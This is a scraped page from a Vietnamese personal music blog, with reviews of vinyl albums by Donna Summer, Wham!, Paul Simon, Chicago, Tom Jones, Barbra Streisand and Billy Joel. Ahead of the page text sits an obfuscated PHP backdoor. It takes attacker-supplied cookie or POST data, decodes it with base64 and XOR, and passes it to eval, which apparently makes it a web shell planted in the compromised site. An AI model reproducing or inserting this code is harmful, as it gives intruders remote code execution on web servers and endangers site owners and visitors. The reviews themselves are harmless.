$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Music – Page 4 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Music (page 4 of 18)

Donna Summer – Donna Summer

Album cùng tên này cũng là album duy nhất mà mình có của nữ hoàng nhạc disco Donna Summer. Mình không hẳn là fan của thế loại disco, nhưng cũng muốn tìm tòi nghe thử xem thế nào nên mới lấy đĩa này về. Thật ra, ban đầu định lấy Bad Girl vốn nổi tiếng hơn ở tiệm, nhưng đĩa đó trầy nhiều quá nên thôi vậy.

Đúng ra thì album này không tệ. Ngược lại, nó khác với các album trước đó của Summer. Sau khi đầu quân cho hãng record mới là Geffen, Summer được kì vọng tiếp tục có những album bán chạy như tôm tươi trước đây, nhưng kết quả không được mong muốn. Vì lẽ đó, ông chủ của Geffen mới mời đến nhà sản xuất Quincy Jones – vốn khi đó đang lên rất nhanh sau nhiều album thực hiện cho Michael Jackson.

Tuy Donna Summer (album) không đạt được doanh thu như kì vọng, nó cũng đã cho thấy một Summer khá mới lạ. Trong album này, ngoài chủ đạo disco, vẫn có thể thấy những ngã rẽ nhỏ sang các dòng khác, đó có thể là chút soul hay mang chất thánh ca trong ca khúc (If It) Hurts Just A Little; hay rock trong ca khúc Protection (vốn ban đầu dự định sẽ hợp tác cùng Bruce Springsteen); album còn có ca khúc jazz nổi tiếng của Billy Strayhorn: Lush Life.

Album được thu âm chỉ trong 6 tháng kể từ session đầu tiên. Donna Summer sau này khi trả lời phỏng vấn có nói đây là một trong những album khó nhất mà cô từng thu. Phần vì nó thêm vài thể loại khác, phần vì nhà sản xuất mới Quincy Jones rất khắt khe. Khó mà nói album này có thể liệt vào top những album trong sự nghiệp của Summer, nhưng nó cũng không đến nỗi bết bát quá. Mình không thích disco lắm, nên nếu cho điểm, mình chỉ cho 3.5/5 điểm, vì nó không hay đủ để cuốn hút kẻ ngoại đạo như mình.

Wham! – Make It Big

Nói thế nào về Wham! nhỉ? Mình biết một nửa của Wham! (và có lẽ đa phần mọi người cũng thế) – George Michael, hơn là nửa còn lại Andrew Ridgely. Có lẽ đây cũng là vấn đề thường thấy ở các cặp song ca: thường sẽ có một ai đó nổi bật hơn cả về tài năng cũng như giọng hát. Make It Big tuy là album chung của duo này, nhưng dấu ấn của George Michael hoàn toàn sâu đậm hơn.

Có điểm khá vui là Wham! có thể được liệt vào blue-eyed soul – vốn là cách phân biệt rất ngớ ngẩn mà giới phê bình âm nhạc nặn ra, để chỉ những tay da trắng tóc vàng mắt xanh hát thứ nhạc soul vốn gắn liền với những người da màu. Cậu chàng George là một tay điển hình như vậy. George ngọt ngào gì đâu, điều này có thể nghe ra từ giọng hát cậu ta. Dù Wham! có phần giống với hình mẫu boyband đương đại mà mới chỉ thịnh hành tầm hơn chục năm sau đó, tài năng của George lại ở một đẳng cấp khác hẳn. George có thể vừa thị trường hút lòng fan nữ, vừa trầm lắng rất rung động nghệ thuật.

Make It Big ngắn hơn hẳn so với các album thông thường, cả record dài dưới 40 phút, với 8 bài hát, 4 bài mỗi mặt. Mình nghĩ độ dài vậy là hợp lí. Nó có những bài vừa đủ yếu tố thị trường pop-disco để bán album, vừa ngắn để người ta không có ấn tượng rằng đây chỉ là một trong những album pop thông thường. Make It Big đúng như cái tên, thành công vang dội ở hầu như tất cả các bảng xếp hạng khắp mọi quốc gia. Đặc biệt một trong những bài hát mình đánh giá hay nhất trong lịch sử nhạc pop: Careless Whisper, đã đưa tên tuổi George Michael lên một tầm cao mới – như một tay nhạc sĩ viết nhạc lẫn trình bày thượng thặng.

Make It Big là một record nghe vừa đủ nửa tiếng đầu, và thăng hoa tột đỉnh ở tầm sáu phút cuối. Ắt thế là đủ.

So I’m never gonna dance again
The way I danced with you

Paul Simon – One Trick Pony

Trong cặp song ca danh tiếng một thời Simon & Garfunkel thì Paul Simon đóng vai trò có thể nói là quan trọng hơn người bạn Art Garfunkel. Hầu như toàn bộ những bài hát của cặp song ca này đều do Simon viết lời, trong đó, dĩ nhiên có những ca khúc đã rất quen thuộc với đông đảo thính giả yêu nhạc trên thế giới: The Sound of Silence, Mrs. Robinson, Bridge Over the Troubled Water… Sau khi nhóm tan rã vào năm 1970, Paul Simon đã có sự nghiệp solo rất thành công, ông vẫn cặm cụi sáng tác và trình diễn, nhưng buồn thay, lần này chỉ có một mình, cùng cây đàn guitar tinh tính tình tang.

One Trick Pony là album thứ 5 của Paul Simon, ra đời cùng lúc với bộ phim cùng tên mà ông thủ vai chính. Mình chưa có dịp xem phim này, nhưng thấy bảo tuy album được xem là soundtrack của bộ phim, cùng một ca khúc lại được trình diễn theo một phong cách khác biệt giữa phim và nhạc. Khá là thú vị.

Mình khá là ngạc nhiên khi lần đầu nghe album này, vì đây là album solo đầu tiên của Simon mà mình nghe kể từ thuở Simon & Garfunkel xa xưa. Nói thế nào nhỉ? Đại loại nếu không nhìn tên ca sĩ, thì chắc mình sẽ không ngờ đây là Paul Simon. Cũng có thể, The Sound of Silence là mốc son quá chói lọi trong sự nghiệp của Simon nói riêng và cặp song ca nói chung, nên những ca khúc solo sau này của Simon, nghe có chút gì đó hơi thiếu và chưa đủ. Giọng Simon chậm rãi và buồn man mác, nhưng nhạc đã là cái thứ nhạc pop-jazz lẫn tí funk của những tay ca sĩ đã bắt đầu ở phía sườn dốc bên kia của sự nghiệp. Có lẽ hơi đáng tiếc, nhưng chắc chẳng có thể chờ đợi gì hơn.

Nói là nói thế, album vẫn có những phút giây đẹp nhất định, đó là khi Simon buồn bã hỏi mẹ

Where you goin’?

I’m just born

trong That’s Why God Made The Movies, hay những giai điệu đầy hồi ức tuổi thơ trong ca khúc thành công nhất của album Late In The Evening, hoặc chất funk hơi nhẹ nhưng đủ để tăng thêm không khí vui tươi cho album vốn khá ảm đạm từ đầu đến giờ: One Trick Pony.

Một album mình không hài lòng 100%, nhưng mình vẫn đánh giá là một album chất lượng được.

 

Chicago – Chicago II

Record đầu tiên của Chicago – một trong những rock ban tồn tại lâu và thành công nhất mà mình có. Mình nhớ đợt đó mình thấy 2 records của Chicago tại thrift store, tình trạng còn khá tốt, ngẩn người ra một hồi vẫn chẳng nhớ mình từng nghe đến Chicago ở đâu, chỉ có ấn tượng mơ hồ rằng đây là ban nhạc chất lượng và đáng đồng tiền bát gạo. Thế là mua thôi. Tới giờ mới có dịp lôi Chicago ra nghe, mở màn bằng record Chicago II này.

Chicago II có 2 đĩa (4 mặt) khiến mình khá bất ngờ, vì thường studio album ít ai chơi nhiều đến thế, đặc biệt toàn những bài phối khí và chơi nhạc ngon lành. Trước khi bắt đầu nghe Chicago, mình có kì vọng nhạc của họ sẽ hợp gout với mình. Đúng là thế. Cái thứ nhạc đầy ngẫu hứng kết hợp pop rock, jazz và progressive rock ấy khiến mình trầm trồ mãi thôi.

Ngay từ bài mở màn Movin’ In mình đã ngất ngây với tiếng piano hoà cùng giọng ca sĩ rất mộc, xen lẫn ở đó là những đoạn solo kèn bay bổng. Và cứ thế, xuyên suốt album là tiếng kèn jazz hoà với guitar điện tử, piano mộc mạc, tiếng sáo, flute và bộ gõ… cứ như một dàn nhạc giao hưởng đang đánh, làm đầu người nghe cứ phải lắc lư phiêu du mãi. Điểm đặc biệt là các bài đều hoàn hảo và chín tới như nhau, mỗi bài như một trường đoạn tấu nhạc hoà quyện, nghe cảm xúc cứ hoà quyện loại thành một mạch.

Hoàn toàn là ấn tượng rất tốt cho record mình nghe đầu tiên của một ban nhạc sừng sỏ thế này. Chuẩn bị chơi tiếp record còn lại mà mình có của Chicago thôi.

 

Tom Jones – This Is Tom Jones

Danh ca người xứ Wales Tom Jones là một trong những giọng ca nam nổi tiếng nhất thập niên 60, 70. Ông hát đủ mọi thể loại, từ nhẹ nhàng như country, pop, đến mạnh mẽ như rock hay đầy ngẫu hứng với R&B, soul; và thể loại nào ông cũng hát rất hay. Sir Jones có loại giọng baritone khoẻ, dày và có chiều sâu, nghe rất thích, nhất là ở những album như This Is Tom Jones này.

This Is Tom Jones lả lơi với format MOR khá thịnh hành vào thời điểm bấy giờ. MOR (Middle of the road) nói đơn giản là format nhạc theo kiểu thương mại, thị trường hay được phát sóng trên đài phát thanh. Nó giàu âm điệu, nổi bật trên nền nhạc thính phòng là kĩ thuật hát như hoà âm của ca sĩ.

Mở đầu album, ca khúc vốn rất nổi tiếng qua giọng ca của Frank Sinatra – Fly Me to the Moon được Tom Jones trình bày lại mạnh nhưng vẫn không sút kém về giai điệu, như một bài nhạc big-band đích thực, hé lộ cho thấy phần nào loại nhạc sẽ được chơi xuyên sốt trong album. Hey Judes của The Beatles cũng được Sir Jones cover lại nghe hứng thú khác hẳn bản gốc quen thuộc (dù vẫn khó đạt tới độ ‘đơn giản mà hoàn hảo kinh điển’ như khi Beatles hát). Các bài khác trong album cũng được trình bày rất tốt, dù đó là bài nhạc mang khuynh hướng R&B như Dance of Love, những bản ballad đơn giản That Wonderful Sound hay Sitting on the Dock of the Bay với tiếng đàn dây và dàn bè mang lại cảm giác phiêu du.

Vì đây là album Tom Jones đầu tiên mình có và mình nghe nên mình hơi thiên vị xíu. Dù có thể đây không phải là album hay nhất của Tom Jones nhưng với mình đây là album rất tốt, mọi thứ đều hoàn chỉnh khó tìm được lời chê nào.

Barbra Streisand – The Way We Were

Barbra Streisand được rất nhiều báo chí cũng như giới chuyên môn đánh giá cực cao, được ưu ái gọi là Nữ hoàng trong các Diva, là nữ ca sĩ có số lượng đĩa bán chạy nhất mọi thời đại. Mình có kha khá record của bà, The Way We Were là đĩa đầu tiên.

The Way We Were không tồi, nhưng cách Streisand hát và diễn nó khiến mình không thích lắm. Đồng ý là cách Streisand xử lý từng bài nhạc trong album khiến thính giả cảm nhận được bà đã đặt hết tâm hồn của mình vào từng nốt nhạc, từng lời ca, mọi chi tiết dù nhỏ đều được trau chuốt kĩ. Nhưng nhìn chung album như một vở nhạc kịch gắng nhưng gượng. Mình không cảm nhận được gì nhiều khi nghe album này, dù đã nghe lại vài lần.

Vẫn còn vài record khác của Barbra Streisand trong bộ sưu tập, hi vọng lần sau trải nghiệm sẽ tốt hơn.

Billy Joel – Piano Man

Record mà mình biết đến đầu tiên của Billy Joel, đồng thời cũng là (một trong những) record mà mình muốn có nhất, ngay từ trước khi mua turntable. Đúng ra, Piano Man không hay bằng các đĩa khác cũng của Billy Joel sau này mình có, nhưng nó vẫn là đĩa mình ưng nhất trong số các đĩa của Joel.

Piano Man là album thứ hai, và là album rất quan trọng trong sự nghiệp của Joel. Sau khi ra album đầu tiên, ông cắt đứt hợp đồng với Family Productions và dính vào kiện tụng rùm beng. Có những giai đoạn tưởng chừng sự nghiệp âm nhạc của ông bị buộc phải dừng lại. Nhưng không, Joel dành hết tâm huyết của mình vào việc sáng tác. Trong một dịp, đài WMMR ở Philadelphia mời ông thu trực tiếp bài Captain Jack trên sóng. Bài này được ưa thích đến mức trở thành bài hát được thính giả yêu cầu nhiều nhất trong lịch sử của đài. Sau đấy, hãng Columbia Records quyết định kí hợp đồng với ông để sản xuất album kế tiếp. Đó là Piano Man.

Tuy trong Piano Man, Billy Joel chưa hoàn toàn đạt được độ chín muồi trong tài năng, sáng tác và chơi nhạc, nhưng có nhiều ca khúc của ông đã trở thành thương hiệu, mà hầu như những ai yêu mến Billy Joel cũng từng nghe và yêu thích qua. Record này có nhiều ca khúc hay, đáng chú nhất là Travelin’ Prayer – mà sau này Dolly Parton đã đoạt giải Grammy khi cover lại nó vào gần 30 năm sau). Tuy nhiên, ca khúc mình thích nhất trong album này, và cũng là ca khúc khiến mình thích Billy Joel từ lâu, đó là Piano Man.

Yes, they’re sharing a drink they call loneliness
But it’s better than drinkin’ alone

 

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.